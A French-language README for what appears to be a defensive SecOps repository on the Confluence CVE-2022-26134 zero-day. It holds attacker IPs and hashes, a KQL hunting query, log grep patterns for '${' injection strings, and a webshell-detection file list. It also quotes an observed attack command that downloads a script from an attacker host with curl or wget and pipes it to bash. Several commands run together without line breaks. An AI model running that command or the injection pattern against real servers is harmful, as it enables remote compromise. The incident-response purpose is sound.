
Ce dépôt traite de l'exploitation Zero-Day d'Atlassian Confluence, sous l'angle de la défense et de l'analyse, du point de vue d'une équipe SecOps ou Blue Team.
Ce dépôt traite de l'exploitation Zero-Day d'Atlassian Confluence, de sa défense et de son point de vue d'analyse du côté d'une équipe SecOps ou Blue Team
Pendant le week-end du Memorial Day aux États-Unis, Volexity a mené une enquête de réponse aux incidents impliquant deux serveurs web exposés à Internet appartenant à l'un de ses clients, qui exécutaient le logiciel Atlassian Confluence Server. L'enquête a débuté après la détection d'une activité suspecte sur les hôtes, notamment l'écriture de webshells JSP sur le disque. Volexity a immédiatement utilisé Volexity Surge Collect Pro pour collecter la mémoire système et les fichiers clés des systèmes Confluence Server à des fins d'analyse. Après un examen approfondi des données collectées, Volexity a pu déterminer que la compromission du serveur provenait d'un attaquant lançant un exploit pour exécuter du code à distance. Volexity a ensuite pu recréer cet exploit et identifier une vulnérabilité zero-day impactant les versions entièrement à jour de Confluence Server.
Suite à la découverte et à la vérification de cette vulnérabilité, Volexity a contacté Atlassian pour signaler les détails pertinents le 31 mai 2022. Atlassian a depuis confirmé la vulnérabilité et a attribué le problème à CVE-2022-26134. Il a été confirmé qu'elle fonctionne sur les versions actuelles de Confluence Server et Data Center.
Reportez-vous aux détails techniques ICI
154.146.34.145
154.16.105.147
156.146.34.46
156.146.34.52
156.146.34.9
156.146.56.136
198.147.22.148
198.147.22.148
221.178.126.244
45.43.19.91
59.163.248.170
64.64.228.239
66.115.182.102
66.115.182.111
67.149.61.16
98.32.230.38
193.106.191.48
f39b321472b8dac2452e4c0bc687cb5aa401ac6687520fdc9fd523a17477886d
f8df4dd46f02dc86d37d46cf4793e036
DeviceProcessEvents
| where InitiatingProcessFileName has_any( @"tomcat9.exe")
//| where ProcessCommandLine has_any (@"whoami.exe",@"nslookup.exe")
${ dans (répertoire d'installation)/logs/*.logegrep -a -i -f pattern.txt *.log où pattern.txt doit être enregistré comme ${ ou essayez simplement grep "\${" chemin_du_fichier_log ou essayez grep "$%7B" chemin_du_fichier_logfindstr -i noop.jsp "logpath"$jspname_jsp.java dans confluence_install_dir/work/Standalone/. Par exemple, si vous trouvez un shell nommé hack.jsp, vous devriez voir hack_jsp.java. Si vous ne trouvez pas hack.jsp (plus sur le disque), essayez de pivoter dans les journaux web pour rechercher l'accès à celui-ci. Cela donnera la signification de quand il a été accédé/supprimé.process where event='CreateProcess' and parent_process_path='/opt/atlassian/confluence/jre/bin/java' and process_user_name='confluence' peut aider à identifier comme décrit par David ICIbash -c '(curl -s 195.2.79[.]26/cf.sh||wget -q -O- 195.2.79[.]26/cf.sh)|bash dans les journaux web./admin/findspaceattachments.jsp
./admin/cluster/hashclustername.jsp
./admin/default.jsp
./classpath.jsp
./errors/notfound.jsp
./500page.jsp
./errors.jsp
./noop.jsp
Donc, recherchez les fichiers créés récemment qui ne figurent pas dans la liste ci-dessus.
.java dans le répertoire ./confluence/org/apache/jsp/ qui ne devraient pas s'y trouver.java->bash->python->bash